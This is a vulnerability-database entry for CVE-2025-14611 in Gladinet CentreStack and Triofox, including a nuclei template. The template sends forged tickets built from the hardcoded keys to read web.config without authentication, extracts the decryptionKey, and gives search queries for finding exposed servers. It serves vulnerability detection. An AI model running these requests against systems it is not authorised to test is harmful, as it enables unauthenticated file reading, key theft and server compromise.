Lucene search
K

Gladinet CentreStack & Triofox - Hardcoded Credentials

🗓️ 04 Feb 2026 07:00:26Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 13 Views

Critical vulnerability in Gladinet CentreStack and Triofox from hardcoded credentials enabling file inclusion.

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Use of Hard-coded Credentials in Gladinet Centrestack
29 Dec 202511:21
githubexploit
ATTACKERKB
CVE-2025-14611
12 Dec 202521:01
attackerkb
Circl
CVE-2025-14611
12 Dec 202521:27
circl
CISA KEV Catalog
Gladinet CentreStack and Triofox Hard Coded Cryptographic Vulnerability
15 Dec 202500:00
cisa_kev
CISA
CISA Adds Two Known Exploited Vulnerabilities to Catalog
15 Dec 202512:00
cisa
CNNVD
Gladinet CentreStack 安全漏洞
12 Dec 202500:00
cnnvd
CVE
CVE-2025-14611
12 Dec 202521:01
cve
Cvelist
CVE-2025-14611 Gladinet CentreStack and TrioFox Hard Coded AES Keys
12 Dec 202521:01
cvelist
EUVD
EUVD-2025-203165
12 Dec 202521:01
euvd
Metasploit
Gladinet CentreStack/Triofox Access Ticket Forge
4 Feb 202618:58
metasploit
Rows per page
id: CVE-2025-14611

info:
  name: Gladinet CentreStack & Triofox - Hardcoded Credentials
  author: 0xanis
  severity: critical
  description: |
    Gladinet CentreStack and Triofox < 16.12.10420.56791 contain a hardcoded credentials vulnerability caused by use of hardcoded AES cryptoscheme values, letting attackers perform arbitrary local file inclusion without authentication, potentially leading to full system compromise.
  impact: |
    Attackers can exploit hardcoded AES keys to perform arbitrary local file inclusion, potentially leading to full system compromise.
  remediation: |
    Update to version 16.12.10420.56791 or later.
  reference:
    - https://www.huntress.com/blog/active-exploitation-gladinet-centrestack-triofox-insecure-cryptography-vulnerability
    - https://nvd.nist.gov/vuln/detail/CVE-2025-14611
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cwe-id: CWE-321
  metadata:
    verified: true
    max-request: 2
    fofa-query: title="CentreStack" || title="Triofox"
    google-query: intitle:"CentreStack - Login" || intitle:"Triofox - Login"
  tags: cve,cve2025,gladinet,centrestack,triofox,kev,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/storage/filesvr.dn?t={{ticket}}"

    attack: batteringram
    payloads:
      ticket:
        # C:\Program Files (x86)\Gladinet Cloud Enterprise\root\web.config
        - "vghpI7EToZUDIZDdprSubL3mTZ2:aCLI:8Zra5AOPvX4TEEXlZiueqNysfRx7Dsd3P5l6eiYyDiG8Lvm0o41m|GbA|RIwrK0WT6jLb:ulpCaAEZ7n1cnc6XQR3EtoADI"
        # C:\Program Files\Gladinet Cloud Enterprise\root\web.config
        - "vghpI7EToZUDIZDdprSubEhRtHNTizyG2QqrcdDETcITXhiueSqu1pPPD0BQ03d6BDri8Usk8QTlEK1U8I2khiLTdy5632hOGCvV6bq1ZSQKpxPmISgLb:TSHrns|y3r"

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "<configuration>","<system.web>")'
          - 'contains_any(header, "application/xml","text/xml","application/octet-stream")'
        condition: and

    extractors:
      - type: regex
        part: body
        name: decryption_key
        group: 1
        regex:
          - 'decryptionKey="([A-Fa-f0-9]+)"'
# digest: 4a0a0047304502203460345f0ae0faebf12e4e95a52625787b5de9a1b284ff55a0b0f2f8d0882a76022100cb98226fff7fcba505fec6b8521181ce320d0e87cdeb4b9a489e117417739947:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.8Medium risk
Vulners AI Score6.8
CVSS 3.19.8
CVSS 47.1
EPSS0.50949
SSVC
13